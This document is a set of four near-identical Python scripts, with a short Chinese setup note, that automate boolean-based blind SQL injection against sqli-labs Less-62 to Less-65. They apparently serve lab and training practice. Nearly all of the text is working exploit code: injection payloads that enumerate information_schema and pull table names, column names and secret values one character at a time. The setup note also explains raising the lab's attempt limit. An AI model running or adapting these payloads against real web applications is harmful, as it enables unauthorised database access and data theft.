运行前需要先安装 requests 和 lxml 两个包（pip install requests lxml），修改脚本中 url 和 referer 的参数值（cookie 里的会话信息也要换成自己的），把靶场 index.php 中的 $times 改为 13000，并重置一下 challenges 数据库。
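"""Less-62 boolean-based blind SQL injection brute-force script.

Setup: install ``requests`` and ``lxml`` (pip), set ``$times= 13000`` in the
lab's index.php, reset the ``challenges`` database, then run this file.

Method: for each character position the script tries every candidate byte in
``list_range``, sends ``?id=<payload>`` and treats the response as "true" when
the page contains a ``<font color='#00FFFF'>`` element.  The oracle is that
marker element, not the response length.

This is offensive tooling for the sqli-labs training target; run it only
against an instance you own or are authorised to test.
"""
import requests
from lxml import etree

# Target page; change url/referer to your own lab instance.
url = 'http://192.168.31.242/sqli-labs/Less-62/'
headers = {
    'referer': 'http://192.168.31.242/sqli-labs/Less-62/',
    # Session cookie for the challenge page.  Copy it from your own browser
    # session; do not commit a live token.
    'cookie': 'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78',
}
payload_key = "?id="
# Seconds to wait per request so a stalled lab server cannot hang the loop.
request_timeout = 10
# Candidate byte values tried at each position: a-z, '_', ',', A-Z, 0-9.
# A character outside this set (e.g. '-', '.', ' ', '@') matches nothing and
# ends extraction early, so the result is truncated at that point.
list_range = (list(range(97, 123)) + [95] + [44]
              + list(range(65, 91)) + list(range(48, 58)))
request_times = 0

# The ') prefix closes what looks like a ('...') wrapper around id, and %23
# (a URL-encoded '#') comments out the rest of the query.  Format slots are
# filled as: leading names, then character position, then ASCII code.  The
# double-quoted string literals assume MySQL's default sql_mode (no
# ANSI_QUOTES).
alltb_payload = """') or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """') or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""


def same(payload, *params):
    """Recover one ``group_concat`` result character by character.

    ``payload`` is a format string whose last two ``{}`` slots receive the
    1-based character position and the candidate ASCII code; ``params`` fill
    the leading slots (schema / table / column names, unquoted, exactly as
    returned by an earlier call).  Every candidate costs one HTTP request,
    counted in the module-level ``request_times``.

    Returns the recovered string.  Extraction stops at the first position
    where no candidate matches, which is either the end of the string or a
    character outside ``list_range``.
    """
    global request_times
    recovered = []
    position = 1
    while True:
        for code in list_range:
            query = payload_key + payload.format(*params, position, code)
            response = requests.get(url + query, headers=headers,
                                    timeout=request_timeout)
            request_times += 1
            html = etree.HTML(response.text)
            # Presence of the marker element is taken as a "true" response.
            if html.xpath("//font[@color='#00FFFF']/text()"):
                recovered.append(chr(code))
                break
        else:
            # No candidate matched this position: extraction is finished.
            return ''.join(recovered)
        position += 1


def main():
    """Dump the tables, columns and third-column values of ``challenges``."""
    sel_db = 'challenges'
    all_tb = same(alltb_payload, sel_db)
    print(sel_db + "库里的表:" + all_tb)
    print('-' * 100)
    # all_tb is passed whole as the table name, so this assumes the schema
    # holds a single table; with several it is a comma-joined list and the
    # column lookup below matches nothing.
    sel_tb = all_tb
    all_col = same(allcol_payload, sel_db, sel_tb)
    print(sel_tb + '表里的字段:' + all_col)
    print('-' * 100)
    columns = all_col.split(',')
    if len(columns) < 3:
        raise SystemExit('expected at least 3 columns in ' + sel_db + '.'
                         + sel_tb + ', got: ' + repr(all_col))
    # The third column is assumed to hold the secret; adjust the index if the
    # table layout differs.
    key = columns[2]
    sel_col = key
    all_values = same(allvalue_payload, sel_col, sel_db, sel_tb)
    print(sel_col + '的值:' + all_values)
    print('-' * 100)
    print('一共请求了' + str(request_times) + '次')


if __name__ == '__main__':
    main()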
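"""Less-63 boolean-based blind SQL injection brute-force script.

Setup: install ``requests`` and ``lxml`` (pip), set ``$times= 13000`` in the
lab's index.php, reset the ``challenges`` database, then run this file.

Method: for each character position the script tries every candidate byte in
``list_range``, sends ``?id=<payload>`` and treats the response as "true" when
the page contains a ``<font color='#00FFFF'>`` element.  The oracle is that
marker element, not the response length.

This is offensive tooling for the sqli-labs training target; run it only
against an instance you own or are authorised to test.
"""
import requests
from lxml import etree

# Target page; change url/referer to your own lab instance.
url = 'http://192.168.31.242/sqli-labs/Less-63/'
headers = {
    'referer': 'http://192.168.31.242/sqli-labs/Less-63/',
    # Session cookie for the challenge page.  Copy it from your own browser
    # session; do not commit a live token.
    'cookie': 'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78',
}
payload_key = "?id="
# Seconds to wait per request so a stalled lab server cannot hang the loop.
request_timeout = 10
# Candidate byte values tried at each position: a-z, '_', ',', A-Z, 0-9.
# A character outside this set (e.g. '-', '.', ' ', '@') matches nothing and
# ends extraction early, so the result is truncated at that point.
list_range = (list(range(97, 123)) + [95] + [44]
              + list(range(65, 91)) + list(range(48, 58)))
request_times = 0

# The ' prefix closes what looks like a '...' wrapper around id, and %23
# (a URL-encoded '#') comments out the rest of the query.  Format slots are
# filled as: leading names, then character position, then ASCII code.  The
# double-quoted string literals assume MySQL's default sql_mode (no
# ANSI_QUOTES).
alltb_payload = """' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """' or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """' or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""


def same(payload, *params):
    """Recover one ``group_concat`` result character by character.

    ``payload`` is a format string whose last two ``{}`` slots receive the
    1-based character position and the candidate ASCII code; ``params`` fill
    the leading slots (schema / table / column names, unquoted, exactly as
    returned by an earlier call).  Every candidate costs one HTTP request,
    counted in the module-level ``request_times``.

    Returns the recovered string.  Extraction stops at the first position
    where no candidate matches, which is either the end of the string or a
    character outside ``list_range``.
    """
    global request_times
    recovered = []
    position = 1
    while True:
        for code in list_range:
            query = payload_key + payload.format(*params, position, code)
            response = requests.get(url + query, headers=headers,
                                    timeout=request_timeout)
            request_times += 1
            html = etree.HTML(response.text)
            # Presence of the marker element is taken as a "true" response.
            if html.xpath("//font[@color='#00FFFF']/text()"):
                recovered.append(chr(code))
                break
        else:
            # No candidate matched this position: extraction is finished.
            return ''.join(recovered)
        position += 1


def main():
    """Dump the tables, columns and third-column values of ``challenges``."""
    sel_db = 'challenges'
    all_tb = same(alltb_payload, sel_db)
    print(sel_db + "库里的表:" + all_tb)
    print('-' * 100)
    # all_tb is passed whole as the table name, so this assumes the schema
    # holds a single table; with several it is a comma-joined list and the
    # column lookup below matches nothing.
    sel_tb = all_tb
    all_col = same(allcol_payload, sel_db, sel_tb)
    print(sel_tb + '表里的字段:' + all_col)
    print('-' * 100)
    columns = all_col.split(',')
    if len(columns) < 3:
        raise SystemExit('expected at least 3 columns in ' + sel_db + '.'
                         + sel_tb + ', got: ' + repr(all_col))
    # The third column is assumed to hold the secret; adjust the index if the
    # table layout differs.
    key = columns[2]
    sel_col = key
    all_values = same(allvalue_payload, sel_col, sel_db, sel_tb)
    print(sel_col + '的值:' + all_values)
    print('-' * 100)
    print('一共请求了' + str(request_times) + '次')


if __name__ == '__main__':
    main()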
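"""Less-64 boolean-based blind SQL injection brute-force script.

Setup: install ``requests`` and ``lxml`` (pip), set ``$times= 13000`` in the
lab's index.php, reset the ``challenges`` database, then run this file.

Method: for each character position the script tries every candidate byte in
``list_range``, sends ``?id=<payload>`` and treats the response as "true" when
the page contains a ``<font color='#00FFFF'>`` element.  The oracle is that
marker element, not the response length.

This is offensive tooling for the sqli-labs training target; run it only
against an instance you own or are authorised to test.
"""
import requests
from lxml import etree

# Target page; change url/referer to your own lab instance.
url = 'http://192.168.31.242/sqli-labs/Less-64/'
headers = {
    'referer': 'http://192.168.31.242/sqli-labs/Less-64/',
    # Session cookie for the challenge page.  Copy it from your own browser
    # session; do not commit a live token.
    'cookie': 'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78',
}
payload_key = "?id="
# Seconds to wait per request so a stalled lab server cannot hang the loop.
request_timeout = 10
# Candidate byte values tried at each position: a-z, '_', ',', A-Z, 0-9.
# A character outside this set (e.g. '-', '.', ' ', '@') matches nothing and
# ends extraction early, so the result is truncated at that point.
list_range = (list(range(97, 123)) + [95] + [44]
              + list(range(65, 91)) + list(range(48, 58)))
request_times = 0

# The 1)) prefix supplies a valid numeric id and closes what looks like a
# ((...)) wrapper, so the page is "true" only when the AND-ed condition holds;
# %23 (a URL-encoded '#') comments out the rest of the query.  Format slots
# are filled as: leading names, then character position, then ASCII code.
# The double-quoted string literals assume MySQL's default sql_mode (no
# ANSI_QUOTES).
alltb_payload = """1)) and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """1)) and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """1)) and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""


def same(payload, *params):
    """Recover one ``group_concat`` result character by character.

    ``payload`` is a format string whose last two ``{}`` slots receive the
    1-based character position and the candidate ASCII code; ``params`` fill
    the leading slots (schema / table / column names, unquoted, exactly as
    returned by an earlier call).  Every candidate costs one HTTP request,
    counted in the module-level ``request_times``.

    Returns the recovered string.  Extraction stops at the first position
    where no candidate matches, which is either the end of the string or a
    character outside ``list_range``.
    """
    global request_times
    recovered = []
    position = 1
    while True:
        for code in list_range:
            query = payload_key + payload.format(*params, position, code)
            response = requests.get(url + query, headers=headers,
                                    timeout=request_timeout)
            request_times += 1
            html = etree.HTML(response.text)
            # Presence of the marker element is taken as a "true" response.
            if html.xpath("//font[@color='#00FFFF']/text()"):
                recovered.append(chr(code))
                break
        else:
            # No candidate matched this position: extraction is finished.
            return ''.join(recovered)
        position += 1


def main():
    """Dump the tables, columns and third-column values of ``challenges``."""
    sel_db = 'challenges'
    all_tb = same(alltb_payload, sel_db)
    print(sel_db + "库里的表:" + all_tb)
    print('-' * 100)
    # all_tb is passed whole as the table name, so this assumes the schema
    # holds a single table; with several it is a comma-joined list and the
    # column lookup below matches nothing.
    sel_tb = all_tb
    all_col = same(allcol_payload, sel_db, sel_tb)
    print(sel_tb + '表里的字段:' + all_col)
    print('-' * 100)
    columns = all_col.split(',')
    if len(columns) < 3:
        raise SystemExit('expected at least 3 columns in ' + sel_db + '.'
                         + sel_tb + ', got: ' + repr(all_col))
    # The third column is assumed to hold the secret; adjust the index if the
    # table layout differs.
    key = columns[2]
    sel_col = key
    all_values = same(allvalue_payload, sel_col, sel_db, sel_tb)
    print(sel_col + '的值:' + all_values)
    print('-' * 100)
    print('一共请求了' + str(request_times) + '次')


if __name__ == '__main__':
    main()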
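"""Less-65 boolean-based blind SQL injection brute-force script.

Setup: install ``requests`` and ``lxml`` (pip), set ``$times= 13000`` in the
lab's index.php, reset the ``challenges`` database, then run this file.

Method: for each character position the script tries every candidate byte in
``list_range``, sends ``?id=<payload>`` and treats the response as "true" when
the page contains a ``<font color='#00FFFF'>`` element.  The oracle is that
marker element, not the response length.

This is offensive tooling for the sqli-labs training target; run it only
against an instance you own or are authorised to test.
"""
import requests
from lxml import etree

# Target page; change url/referer to your own lab instance.
url = 'http://192.168.31.242/sqli-labs/Less-65/'
headers = {
    'referer': 'http://192.168.31.242/sqli-labs/Less-65/',
    # Session cookie for the challenge page.  Copy it from your own browser
    # session; do not commit a live token.
    'cookie': 'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78',
}
payload_key = "?id="
# Seconds to wait per request so a stalled lab server cannot hang the loop.
request_timeout = 10
# Candidate byte values tried at each position: a-z, '_', ',', A-Z, 0-9.
# A character outside this set (e.g. '-', '.', ' ', '@') matches nothing and
# ends extraction early, so the result is truncated at that point.
list_range = (list(range(97, 123)) + [95] + [44]
              + list(range(65, 91)) + list(range(48, 58)))
request_times = 0

# The 1") prefix supplies a valid id and closes what looks like a ("...")
# wrapper, so the page is "true" only when the AND-ed condition holds; %23
# (a URL-encoded '#') comments out the rest of the query.  Format slots are
# filled as: leading names, then character position, then ASCII code.  The
# double-quoted string literals assume MySQL's default sql_mode (no
# ANSI_QUOTES).
alltb_payload = """1") and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """1") and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """1") and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""


def same(payload, *params):
    """Recover one ``group_concat`` result character by character.

    ``payload`` is a format string whose last two ``{}`` slots receive the
    1-based character position and the candidate ASCII code; ``params`` fill
    the leading slots (schema / table / column names, unquoted, exactly as
    returned by an earlier call).  Every candidate costs one HTTP request,
    counted in the module-level ``request_times``.

    Returns the recovered string.  Extraction stops at the first position
    where no candidate matches, which is either the end of the string or a
    character outside ``list_range``.
    """
    global request_times
    recovered = []
    position = 1
    while True:
        for code in list_range:
            query = payload_key + payload.format(*params, position, code)
            response = requests.get(url + query, headers=headers,
                                    timeout=request_timeout)
            request_times += 1
            html = etree.HTML(response.text)
            # Presence of the marker element is taken as a "true" response.
            if html.xpath("//font[@color='#00FFFF']/text()"):
                recovered.append(chr(code))
                break
        else:
            # No candidate matched this position: extraction is finished.
            return ''.join(recovered)
        position += 1


def main():
    """Dump the tables, columns and third-column values of ``challenges``."""
    sel_db = 'challenges'
    all_tb = same(alltb_payload, sel_db)
    print(sel_db + "库里的表:" + all_tb)
    print('-' * 100)
    # all_tb is passed whole as the table name, so this assumes the schema
    # holds a single table; with several it is a comma-joined list and the
    # column lookup below matches nothing.
    sel_tb = all_tb
    all_col = same(allcol_payload, sel_db, sel_tb)
    print(sel_tb + '表里的字段:' + all_col)
    print('-' * 100)
    columns = all_col.split(',')
    if len(columns) < 3:
        raise SystemExit('expected at least 3 columns in ' + sel_db + '.'
                         + sel_tb + ', got: ' + repr(all_col))
    # The third column is assumed to hold the secret; adjust the index if the
    # table layout differs.
    key = columns[2]
    sel_col = key
    all_values = same(allvalue_payload, sel_col, sel_db, sel_tb)
    print(sel_col + '的值:' + all_values)
    print('-' * 100)
    print('一共请求了' + str(request_times) + '次')


if __name__ == '__main__':
    main()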